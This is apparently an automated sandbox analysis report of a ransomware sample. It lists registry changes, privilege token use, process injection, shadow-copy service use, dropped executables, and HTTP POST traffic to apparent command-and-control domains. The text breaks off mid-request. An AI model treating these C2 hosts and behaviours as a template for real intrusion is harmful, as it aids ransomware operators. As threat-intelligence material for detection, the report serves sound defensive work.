System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000efb94991ceeada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-125 = "Microsoft Word Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-184 = "Microsoft PowerPoint Macro-Enabled Design Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e55bea90ceeada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f5bb2a91ceeada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000817e6d91ceeada01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000026f46391ceeada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6003 = "Windows Command Script"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f68b2f91ceeada01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeAuditPrivilege	3292	fxssvc.exe
Token: SeRestorePrivilege	2800	TieringEngineService.exe
Token: SeManageVolumePrivilege	2800	TieringEngineService.exe
Token: SeAssignPrimaryTokenPrivilege	1032	AgentService.exe
Token: SeBackupPrivilege	4516	vssvc.exe
Token: SeRestorePrivilege	4516	vssvc.exe
Token: SeAuditPrivilege	4516	vssvc.exe
Token: SeBackupPrivilege	3536	wbengine.exe
Token: SeRestorePrivilege	3536	wbengine.exe
Token: SeSecurityPrivilege	3536	wbengine.exe
Token: 33	3100	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	3100	SearchIndexer.exe
Token: SeDebugPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeDebugPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeDebugPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeDebugPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeDebugPrivilege	4500	2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
Token: SeDebugPrivilege	3220	alg.exe
Token: SeDebugPrivilege	3220	alg.exe
Token: SeDebugPrivilege	3220	alg.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 5964	3100	SearchIndexer.exe	120
PID 3100 wrote to memory of 5964	3100	SearchIndexer.exe	120
PID 3100 wrote to memory of 6044	3100	SearchIndexer.exe	123
PID 3100 wrote to memory of 6044	3100	SearchIndexer.exe	123

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:4868

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2596

C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2548

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:2472

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:2236

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:3144

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:2180

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4904

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:1800

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2672

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:2948

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:4292

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:4688

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:4468

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4172,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:8
1⤵
PID:2968

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:5040

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:5964
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
  2⤵
  - Modifies data under HKEY_USERS
  PID:6044

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

pywolwnvd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
DNS

pywolwnvd.biz

alg.exe

Remote address:

8.8.8.8:53

Request

pywolwnvd.biz

IN A

Response

pywolwnvd.biz

IN A

54.244.188.177
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
POST

http://pywolwnvd.biz/jravwygahngecv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /jravwygahngecv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fb081ebf5f4700ed1a692950fcaad72b|194.110.13.70|1723257570|1723257570|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://pywolwnvd.biz/lireajgotnxkayy

alg.exe

Remote address:

54.244.188.177:80

Request

POST /lireajgotnxkayy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9745d76dca5276955722428fa532bb4e|194.110.13.70|1723257570|1723257570|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ssbzmoy.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ssbzmoy.biz

IN A

Response

ssbzmoy.biz

IN A

18.141.10.107
POST

http://ssbzmoy.biz/adbrglrn

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /adbrglrn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c8a7ac9739fab8e40bd83b4f6ce47143|194.110.13.70|1723257571|1723257571|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ssbzmoy.biz/vlahmlajbpanh

alg.exe

Remote address:

18.141.10.107:80

Request

POST /vlahmlajbpanh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
